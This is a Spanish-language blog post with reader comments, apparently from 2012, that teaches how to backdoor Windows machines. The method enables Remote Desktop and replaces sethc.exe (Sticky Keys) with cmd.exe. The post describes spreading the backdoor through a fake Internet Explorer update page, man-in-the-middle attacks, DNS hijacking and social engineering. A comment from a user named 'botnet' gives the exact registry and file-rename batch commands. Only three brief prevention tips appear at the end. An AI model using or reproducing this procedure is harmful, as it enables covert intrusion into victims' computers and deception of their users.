A continuación mostrare como ejecutar un backdoor para entrar al sistema sin ser detectado, esta demostración lo hice en una red local, pero funciona de la misma manera en una red inalambrica incluso remotamente, la teoría es la misma, el siguiente backdoor activa la conexión remota al equipo victima y cambia el stickykeys por un prompt.
El backdoor lo desarrolle en vb60 ya que es de facil ejecución en sistemas Windows. Luego creo una pagina fraudulenta donde Microsoft obliga al usuario a instalar la versión actualizada del Internet Explorer, para esto si estas en una red local solo basta con hacer un ataque de Hombre en Medio, en caso que te encuentres remotamente puedes poner la pagina fraudulenta en un hosting y usando ingeniería social mandar el link de dicha pagina, o también cambiar los dns del equipo victima, en caso de existir un servidor proxy podrías encontrar alguna vulnerabilidad para explotarla y cambiar el direccionamiento de las paginas, y así un sin fin de maneras para acceder remotamente.
Una vez que el backdoor ha sido ejecutado, podemos entrar al host remoto de esta manera, con la ayuda del comando rdesktop mas la ip.
Para que te aparezca un prompt activa el stickykeys pulsando 5 veces shift y listo, en la consola digitas explorer para que tengas un entorno mas agradable para hacer lo que desees.
Para evitar este tipo de ataque no basta con tener un antivirus actualizado, por si se dan cuenta la maquina victima tenia instalado un antivirus muy conocido y actualizado a su ultima versión, si no lo recomendable seria:
1. No entrar con usuarios que tienen perfil de Administrador, ya que pueden configurar el sistema.
2. No descargar programas por que solo le indica en una pagina.
3. Tener el firewall activado y configurado para que no permita que se conecten remotamente a su equipo mediante la Conexión Remota de Windows.
Demo
zworg82
25/02/2012
Donde consigo el backdoor?
botnet
02/03/2012
Que tal, mira tu puedes crear el backdoor en el lenguaje que quieras es tu decisión, la esencia del funcionamiento de este backdoor es el siguiente: crea una archivo .bat, y en el interior pega esto
reg add «HKLM\System\CurrentControlSet\Control\Terminal Server»
cd C:\WINDOWS\system32\
REN sethc.exe sethc1.exe
REN cmd.exe sethc.exe
luego ejecutas el .bat y veras que el backdoor se ejecute correctamente
Yo lo hice con vb60 solo para poder tener un .exe
Saludos